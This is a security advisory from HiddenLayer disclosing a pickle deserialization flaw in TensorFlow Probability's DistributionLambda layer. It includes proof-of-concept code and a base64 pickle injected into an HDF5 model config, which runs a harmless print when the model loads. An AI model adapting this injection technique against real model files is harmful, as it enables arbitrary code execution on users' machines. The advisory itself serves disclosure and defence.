HiddenLayer, a Gartner-recognized Cool Vendor for AI Security, is the leading provider of Security for AI. Its security platform helps enterprises safeguard the machine learning models behind their most important products. HiddenLayer is the only company to offer turnkey security for AI that does not add unnecessary complexity to models and does not require access to raw data and algorithms. Founded by a team with deep roots in security and ML, HiddenLayer aims to protect enterprises’ AI from inference, bypass, and extraction attacks, as well as model theft. The company is backed by a group of strategic investors, including M12, Microsoft’s Venture Fund, Moore Strategic Ventures, Booz Allen Ventures, IBM Ventures, and Capital One Ventures.
July 11, 2024
Deserialization of untrusted data leading to arbitrary code execution
SAI Advisory Reference Number
SAI-ADV-2024-001
Summary
Arbitrary code execution can be achieved through the deserialization performed by the _deserialize_function function in tensorflow_probability/python/layers/distribution_layer.py. An attacker can inject a malicious pickle object into an HDF5-formatted model file; when the model is loaded, the object is deserialized via pickle and the malicious code executes on the victim’s machine. The attacker achieves this by placing the pickle object in the model’s DistributionLambda layer under the make_distribution_fn key.
Products Impacted
This potential attack vector is present in TensorFlow Probability v0.7 and newer.
CVSS Score: 7.8
AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H
CWE Categorization
CWE-502: Deserialization of Untrusted Data.
Details
To replicate this attack, we first create a basic sample model based on examples found in the library’s docstrings:
import tensorflow as tf
import tensorflow_probability as tfp
from tensorflow_probability.python.internal import tf_keras
from tensorflow_probability.python.distributions import normal as normal_lib
from tensorflow_probability.python.layers import distribution_layer

tfk = tf_keras
tfkl = tf_keras.layers
tfd = tfp.distributions
tfpl = tfp.layers

# A minimal model ending in a DistributionLambda layer.
model = tfk.Sequential([
    tfkl.Dense(2, input_shape=(5,)),
    distribution_layer.DistributionLambda(lambda t: normal_lib.Normal(
        loc=t[..., 0:1], scale=tf.exp(t[..., 1:2])))
])

# Save in the legacy HDF5 format, which the injection below targets.
model.save("distribution_lambda_clean.h5")
We then use h5py to inject a base64-encoded pickle object into the model file. The encoded string is added to the existing DistributionLambda layer’s config under the make_distribution_fn key (a sketch of the injection script follows the config below), resulting in the following layer config:
{"class_name": "DistributionLambda",
"config": {"name": "distribution_lambda", "trainable": true,
"dtype": "float32", "function": ["4wA...Q==\n",
null, ["sample", ""]], "function_type": "lambda",
"module": "tensorflow_probability.python.layers.distribution_layer",
"output_shape": null, "output_shape_type": "raw",
"output_shape_module": null, "arguments": {},
"make_distribution_fn": "gASVMQAAAAAAAACMCGJ1aWx0aW5zlIwFcHJpbnSUk5SMFEluamVjdGlvbiBzdWNjZXNzZnVslIWUUpQu",
"convert_to_tensor_fn": "sample"}}]}}
We then load the model from the perspective of a victim user:
import tensorflow as tf
import tensorflow_probability as tfp

loaded_model = tf.keras.models.load_model(
    'distribution_lambda_clean.h5', custom_objects={
        'DistributionLambda': tfp.layers.DistributionLambda
    })
This sends the model through _deserialize_function, which base64-decodes the value under the make_distribution_fn key and runs pickle.loads on it, executing the injected arbitrary code (in our case, printing ‘Injection successful’):
def _deserialize_function(code):
  raw_code = codecs.decode(code.encode('ascii'), 'base64')
  return pickle.loads(raw_code)
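For illustration, the injected payload can be disassembled without executing it using Python’s standard pickletools module; the hard-coded string below is the base64 value from the config shown earlier:

import base64
import pickletools

payload = ("gASVMQAAAAAAAACMCGJ1aWx0aW5zlIwFcHJpbnSUk5SM"
           "FEluamVjdGlvbiBzdWNjZXNzZnVslIWUUpQu")

# Disassemble the pickle opcodes without running them. The output shows
# STACK_GLOBAL resolving builtins.print, the string 'Injection successful',
# and a REDUCE opcode, i.e. print('Injection successful') runs on load.
pickletools.dis(base64.b64decode(payload))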
Timeline
June 25, 2024 — Reported through Google’s open source VDP
June 28, 2024 — Vendor responded that the security risk described in this report does not meet the security team’s threshold for this type of escalation, but that they are happy for us to disclose it as an advisory
July 11, 2024 — Advisory disclosure